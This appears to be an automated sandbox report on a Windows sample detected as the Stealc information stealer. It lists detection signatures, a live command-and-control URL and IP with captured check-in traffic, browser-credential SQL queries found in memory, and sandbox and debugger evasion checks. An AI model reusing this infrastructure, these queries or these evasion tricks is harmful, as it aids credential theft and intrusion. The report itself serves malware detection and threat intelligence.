Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1531318
MD5: 9c7193e94b13d7380dccc18b19a95158
SHA1: 4d69fe7afa38cf9fa65fd5acd25e66bc6ad230b4
SHA256: 480374d99e5a098171a92a8b09b3a6fb5a43c216e21d328e6c17d87b5d12c2f0
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 2004 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9C7193E94B13D7380DCCC18B19A95158)
  • cleanup
Malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara matches (PCAP):
  Source: dump.pcap | Rule: JoeSecurity_Stealc_1 | Description: Yara detected Stealc | Author: Joe Security

Yara matches (dumped memory):
  Source: 00000000.00000003.1664387616.0000000005670000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
  Source: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
  Source: 00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
  Source: Process Memory Space: file.exe PID: 2004 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
  Source: Process Memory Space: file.exe PID: 2004 | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

Yara matches (unpacked PEs):
  Source: 0.2.file.exe.cb0000.0.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

Sigma: No Sigma rule has matched

Suricata IDS alerts:
  Timestamp: 2024-10-11T01:49:59.923701+0200 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.4 | Source Port: 49730 | Destination IP: 185.215.113.37 | Destination Port: 80 | Protocol: TCP


                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.cb0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CBC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat (0_2_00CBC820)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree (0_2_00CB9AC0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree (0_2_00CB7240)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB9B60 CryptUnprotectData,LocalAlloc,LocalFree (0_2_00CB9B60)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA (0_2_00CC8EA0)
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose (0_2_00CC38B0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose (0_2_00CC4910)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CBDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose (0_2_00CBDA80)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CBE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA (0_2_00CBE430)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen (0_2_00CC4570)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CBED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose (0_2_00CBED20)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose (0_2_00CB16D0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose (0_2_00CC3EA0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CBF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose (0_2_00CBF6B0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CBBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose (0_2_00CBBE70)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CBDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose (0_2_00CBDE10)

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  Host: 185.215.113.37
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFC
  Host: 185.215.113.37
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 34 35 46 41 42 43 33 31 35 31 30 34 30 38 31 39 30 37 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 2d 2d 0d 0a
  Data Ascii:
    ------GDGHJEHJJDAAAKEBGCFC
    Content-Disposition: form-data; name="hwid"

    F45FABC315104081907672
    ------GDGHJEHJJDAAAKEBGCFC
    Content-Disposition: form-data; name="build"

    doma
    ------GDGHJEHJJDAAAKEBGCFC--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle (0_2_00CB4880)
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  Host: 185.215.113.37
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
  POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFC
  Host: 185.215.113.37
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 34 35 46 41 42 43 33 31 35 31 30 34 30 38 31 39 30 37 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 2d 2d 0d 0a
  Data Ascii:
    ------GDGHJEHJJDAAAKEBGCFC
    Content-Disposition: form-data; name="hwid"

    F45FABC315104081907672
    ------GDGHJEHJJDAAAKEBGCFC
    Content-Disposition: form-data; name="build"

    doma
    ------GDGHJEHJJDAAAKEBGCFC--
Source: file.exe, 00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1706114024.00000000018D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1706114024.00000000018F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1706114024.00000000018C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php4&ne
Source: file.exe, 00000000.00000002.1706114024.00000000018C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpd&
Source: file.exe, 00000000.00000002.1706114024.00000000018D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.373h
Source: file.exe, 00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37eE

                System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010851C6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100381A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107E8A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106F8F3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FA92B7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011743C1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010713F8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0112150F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F9E44E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7BC49
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01077DD1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01088755
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107CF78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01081E16
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F5D7D7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB27B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01072E6B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8A771
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00CB45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: qlydljbc ZLIB complexity 0.9947369304234428
Source: file.exe, 00000000.00000003.1664387616.0000000005670000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle (0_2_00CC8680)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn (0_2_00CC3720)
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9XHW8LHR.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT url FROM urls LIMIT 1000;
Source: file.exe, 00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT origin_url, username_value, password_value FROM loginsi;
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1825280 > 1048576
Source: file.exe | Static PE information: Raw size of qlydljbc is bigger than: 0x100000 < 0x197600

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.cb0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;qlydljbc:EW;jrcyigtg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;qlydljbc:EW;jrcyigtg:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress (0_2_00CC9860)
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c42de should be: 0x1c8a57
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: qlydljbc
Source: file.exe | Static PE information: section name: jrcyigtg
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010B3906 push esi; mov dword ptr [esp], ecx (0_2_010B3DC9)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0114790D push esi; mov dword ptr [esp], ecx (0_2_01147863)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push eax; mov dword ptr [esp], esi (0_2_01079959)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push ebp; mov dword ptr [esp], 0DBB4929h (0_2_010799ED)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push 6476BFF4h; mov dword ptr [esp], ebx (0_2_01079A0F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push 36B5E66Eh; mov dword ptr [esp], edi (0_2_01079AE3)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push ebp; mov dword ptr [esp], esi (0_2_01079AE7)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push esi; mov dword ptr [esp], ebx (0_2_01079AF6)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push ecx; mov dword ptr [esp], esi (0_2_01079B24)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push eax; mov dword ptr [esp], 0E57E0EAh (0_2_01079B32)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push ecx; mov dword ptr [esp], edi (0_2_01079C1F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push 153E3B40h; mov dword ptr [esp], edi (0_2_01079C6B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push ecx; mov dword ptr [esp], esi (0_2_01079C84)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push eax; mov dword ptr [esp], ebx (0_2_01079CB5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push edx; mov dword ptr [esp], ecx (0_2_01079CDB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push ebp; mov dword ptr [esp], 5C93D611h (0_2_01079D19)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push 20B823CFh; mov dword ptr [esp], edi (0_2_01079D75)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push ebp; mov dword ptr [esp], 396F5BA5h (0_2_01079D88)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push 10FE46AAh; mov dword ptr [esp], edi (0_2_01079DE0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push 63CF2A32h; mov dword ptr [esp], edi (0_2_01079E21)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push edx; mov dword ptr [esp], ecx (0_2_01079F8F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push edi; mov dword ptr [esp], edx (0_2_01079FD3)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push 00E320EFh; mov dword ptr [esp], edi (0_2_01079FDD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push esi; mov dword ptr [esp], edx (0_2_01079FF4)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push 6B284A9Ah; mov dword ptr [esp], ebp (0_2_0107A01F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push 7C4B119Ah; mov dword ptr [esp], edi (0_2_0107A04A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push ebx; mov dword ptr [esp], 3393174Bh (0_2_0107A09B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push ebx; mov dword ptr [esp], 2CB3E040h (0_2_0107A0DB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push esi; mov dword ptr [esp], 747D05C7h (0_2_0107A110)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push ecx; mov dword ptr [esp], esi (0_2_0107A221)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107992C push 23319677h; mov dword ptr [esp], ebx (0_2_0107A250)
Source: file.exe | Static PE information: section name: qlydljbc entropy: 7.95389639217539

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress (0_2_00CC9860)

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13568)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F12210 second address: F12214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F11A49 second address: F11A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108D56E second address: 108D576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108D576 second address: 108D583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108D583 second address: 108D58D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBD3971C776h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108C6AD second address: 108C6B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108C6B1 second address: 108C6B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108C6B5 second address: 108C6C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBD38EF6166h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108C9D0 second address: 108C9EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FBD3971C786h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108CCEE second address: 108CD0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FBD38EF616Fh 0x0000000a jns 00007FBD38EF6166h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108F4EB second address: 108F50F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBD3971C77Ch 0x00000008 jp 00007FBD3971C776h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edi 0x00000013 jp 00007FBD3971C778h 0x00000019 pushad 0x0000001a popad 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push ebx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108F50F second address: 108F515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108F593 second address: 108F598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
